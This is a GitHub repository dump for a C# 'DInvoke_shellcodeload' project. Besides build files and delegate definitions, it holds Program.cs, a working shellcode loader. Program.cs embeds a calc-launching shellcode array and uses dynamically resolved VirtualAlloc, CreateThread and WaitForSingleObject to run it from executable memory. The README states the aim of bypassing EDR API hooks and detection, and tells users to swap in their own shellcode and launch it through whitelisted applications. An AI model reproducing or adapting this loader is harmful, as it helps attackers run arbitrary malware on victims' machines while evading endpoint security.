├── DInvoke_shellcodeload ├── DInvoke_test │ ├── obj │ │ ├── Debug │ │ │ ├── DInvoke_test.csproj.CoreCompileInputs.cache │ │ │ ├── DInvoke_test.exe │ │ │ ├── DInvoke_test.pdb │ │ │ ├── DInvoke_test.csprojAssemblyReference.cache │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ │ │ └── DInvoke_test.csproj.FileListAbsolute.txt │ │ ├── x64 │ │ │ └── Debug │ │ │ │ ├── DInvoke_test.csproj.CoreCompileInputs.cache │ │ │ │ ├── DInvoke_test.exe │ │ │ │ ├── DInvoke_test.pdb │ │ │ │ ├── DInvoke_test.csprojAssemblyReference.cache │ │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ │ │ │ └── DInvoke_test.csproj.FileListAbsolute.txt │ │ └── x86 │ │ │ └── Debug │ │ │ ├── DInvoke_test.csproj.CoreCompileInputs.cache │ │ │ ├── DInvoke_shellcodeload.csproj.CoreCompileInputs.cache │ │ │ ├── DInvoke_test.exe │ │ │ ├── DInvoke_test.pdb │ │ │ ├── DInvoke_test.csprojAssemblyReference.cache │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── DInvoke_shellcodeload.csprojAssemblyReference.cache │ │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ │ │ ├── DInvoke_test.csproj.FileListAbsolute.txt │ │ │ └── DInvoke_shellcodeload.csproj.FileListAbsolute.txt │ ├── bin │ │ ├── Debug │ │ │ ├── DInvoke_test.exe │ │ │ ├── DInvoke_test.pdb │ │ │ └── DInvoke_test.exe.config │ │ ├── x64 │ │ │ └── Debug │ │ │ │ ├── DInvoke_test.exe │ │ │ │ ├── DInvoke_test.pdb │ │ │ │ └── DInvoke_test.exe.config │ │ └── x86 │ │ │ └── Debug │ │ │ ├── DInvoke_test.exe │ │ │ ├── DInvoke_test.pdb │ │ │ └── DInvoke_test.exe.config │ ├── App.config │ ├── DELEGATES.cs │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── Program.cs │ ├── DInvoke_shellcodeload.csproj │ └── DInvokeFunctions.cs ├── DInvokeFunctions.cs ├── .vs │ └── DInvoke_shellcodeload │ │ └── v16 │ │ └── .suo └── DInvoke_shellcodeload.sln └── README.md 
/DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 8cbe608832de71960b68ed54139bfe678dcf5e2b 2 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvokeFunctions.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | 3 | public class Class1 4 | { 5 | public Class1() 6 | { 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 859f5f4778afbc6b2872b0cb3c439d8e318d66d2 2 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | a11e0089e974131fc82967a48c6205748c49c6f8 2 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_shellcodeload.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | a11e0089e974131fc82967a48c6205748c49c6f8 2 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/.vs/DInvoke_shellcodeload/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/.vs/DInvoke_shellcodeload/v16/.suo -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/Debug/DInvoke_test.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x64/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/x64/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x64/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/x64/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x86/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/x86/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x86/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/x86/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/Debug/DInvoke_test.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x64/Debug/DInvoke_test.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 
-------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x86/Debug/DInvoke_test.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_shellcodeload.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_shellcodeload.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: 
global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\Debug\DInvoke_test.exe.config 2 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\Debug\DInvoke_test.exe 3 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\Debug\DInvoke_test.pdb 4 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\Debug\DInvoke_test.csprojAssemblyReference.cache 5 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\Debug\DInvoke_test.csproj.CoreCompileInputs.cache 6 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\Debug\DInvoke_test.exe 7 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\Debug\DInvoke_test.pdb 8 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x64\Debug\DInvoke_test.exe.config 2 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x64\Debug\DInvoke_test.exe 3 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x64\Debug\DInvoke_test.pdb 4 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x64\Debug\DInvoke_test.csproj.CoreCompileInputs.cache 5 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x64\Debug\DInvoke_test.exe 6 | 
C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x64\Debug\DInvoke_test.pdb 7 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x64\Debug\DInvoke_test.csprojAssemblyReference.cache 8 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.exe.config 2 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.exe 3 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.pdb 4 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.csproj.CoreCompileInputs.cache 5 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.exe 6 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.pdb 7 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.csprojAssemblyReference.cache 8 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/DELEGATES.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Runtime.InteropServices; 7 | 8 | namespace DInvoke_Code 9 | { 10 | public class DELEGATES 11 | { 12 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 13 | public delegate IntPtr VirtualAllocRx( 14 | UInt32 lpStartAddr, 15 | UInt32 size, 16 | UInt32 flAllocationType, 17 | UInt32 flProtect 18 | ); 19 | 20 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 21 | 
public delegate IntPtr CreateThreadRx( 22 | UInt32 lpThreadAttributes, 23 | UInt32 dwStackSize, 24 | IntPtr lpStartAddress, 25 | IntPtr param, 26 | UInt32 dwCreationFlags, 27 | ref UInt32 lpThreadId 28 | ); 29 | 30 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 31 | public delegate UInt32 WaitForSingleObjectRx(IntPtr hHandle, UInt32 dwMilliseconds); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("DInvoke_test")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("DInvoke_test")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 会使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("1cb19721-958a-48ea-aa5a-f7ce9b116f87")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 33 | //通过使用 "*",如下所示: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_shellcodeload.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | 
C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.exe.config 2 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.exe 3 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.pdb 4 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_shellcodeload.csprojAssemblyReference.cache 5 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_shellcodeload.csproj.CoreCompileInputs.cache 6 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.exe 7 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.pdb 8 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\bin\x86\Debug\DInvoke_test.exe.config 9 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\bin\x86\Debug\DInvoke_test.exe 10 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\bin\x86\Debug\DInvoke_test.pdb 11 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\DInvoke_shellcodeload.csprojAssemblyReference.cache 12 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\DInvoke_shellcodeload.csproj.CoreCompileInputs.cache 13 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\DInvoke_test.exe 14 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\DInvoke_test.pdb 15 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_shellcodeload.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | 
# Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31129.286 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DInvoke_shellcodeload", "DInvoke_test\DInvoke_shellcodeload.csproj", "{1CB19721-958A-48EA-AA5A-F7CE9B116F87}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Debug|x86 = Debug|x86 13 | Release|Any CPU = Release|Any CPU 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|x64.ActiveCfg = Debug|x64 21 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|x64.Build.0 = Debug|x64 22 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|x86.ActiveCfg = Debug|x86 23 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|x86.Build.0 = Debug|x86 24 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|x64.ActiveCfg = Release|x64 27 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|x64.Build.0 = Release|x64 28 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|x86.ActiveCfg = Release|x86 29 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|x86.Build.0 = Release|x86 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {083D650C-8A63-465B-BB85-FA74442890BE} 36 | EndGlobalSection 37 | EndGlobal 38 | -------------------------------------------------------------------------------- 
/DInvoke_shellcodeload/DInvoke_test/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using System.Diagnostics; 8 | 9 | namespace DInvoke_Code 10 | { 11 | class Program 12 | { 13 | static void Main(string[] args) 14 | { 15 | 16 | //Dinvoke test 17 | byte[] codepent = new byte[193] { 18 | 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30, 19 | 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff, 20 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52, 21 | 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1, 22 | 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b, 23 | 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03, 24 | 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 25 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, 26 | 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb, 27 | 0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f, 28 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5, 29 | 0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a, 30 | 0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 31 | }; 32 | 33 | // Console.WriteLine((uint)codepent.Length); 34 | // System.Threading.Thread.Sleep(10000); 35 | IntPtr func_ptr = IntPtr.Zero; 36 | // IntPtr pHandle = Process.GetCurrentProcess().Handle; 37 | 38 | func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "VirtualAlloc"); 39 | DELEGATES.VirtualAllocRx VirtualAllocRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.VirtualAllocRx)) as 
DELEGATES.VirtualAllocRx; 40 | IntPtr rMemAddress = VirtualAllocRx(0, (uint)codepent.Length, 0x1000 | 0x2000, 0x40); 41 | 42 | Marshal.Copy(codepent, 0, (IntPtr)(rMemAddress), codepent.Length); 43 | IntPtr hThread = IntPtr.Zero; 44 | IntPtr pinfo = IntPtr.Zero; 45 | UInt32 threadId = 0; 46 | 47 | func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "CreateThread"); 48 | DELEGATES.CreateThreadRx CreateThreadRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.CreateThreadRx)) as DELEGATES.CreateThreadRx; 49 | hThread = CreateThreadRx(0, 0, rMemAddress, pinfo, 0, ref threadId); 50 | 51 | func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "WaitForSingleObject"); 52 | DELEGATES.WaitForSingleObjectRx WaitForSingleObjectRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.WaitForSingleObjectRx)) as DELEGATES.WaitForSingleObjectRx; 53 | WaitForSingleObjectRx(hThread, 0xFFFFFFFF); 54 | } 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DInvoke_shellcodeload_CSharp 2 | 3 | 4 | 5 | Blog link: May not be updated. 6 | 7 | * A ShellcodeLoader based on another project of mine (https://github.com/Kara-4search/Simple_ShellCodeLoader_CSharp), inspired by TheWover (https://github.com/TheWover). 8 | * The purpose is to bypass EDR API hooks, or detection of dangerous APIs. 9 | * Use D/Invoke to load shellcode into memory. 10 | * **I removed a lot of unnecessary code from the original project, to make the code easier to understand.** 11 | * You could change the function name or do other magic works make it better for EDR bypassing. 12 | * I only tested it on x86 with the shellcode below (it is a calc shellcode), but it should be able to work on x64. 
13 | 14 | ```c# 15 | byte[] codepent = new byte[193] { 16 | 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30, 17 | 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff, 18 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52, 19 | 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1, 20 | 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b, 21 | 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03, 22 | 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 23 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, 24 | 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb, 25 | 0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f, 26 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5, 27 | 0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a, 28 | 0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 29 | }; 30 | ``` 31 | 32 | * You could use API monitor(http://www.rohitab.com/apimonitor) to test the project, comparing with the SimpleLoader(https://github.com/Kara-4search/Simple_ShellCodeLoader_CSharp), You could see there is no API call via D/Invoke. 33 | * Kernel functions are not good enough,you could even do the ntdll version of this. 34 | 35 | 36 | ## Usage 37 | 38 | 1. Just replace the shellcode. 39 | 2. Launch it through some white list applications 40 | 41 | 42 | ## Comparing via API monitor 43 | 44 | There are mainly 3 APIs we are gonna monitor: 45 | 46 | * VirtualAlloc 47 | * CreateThread 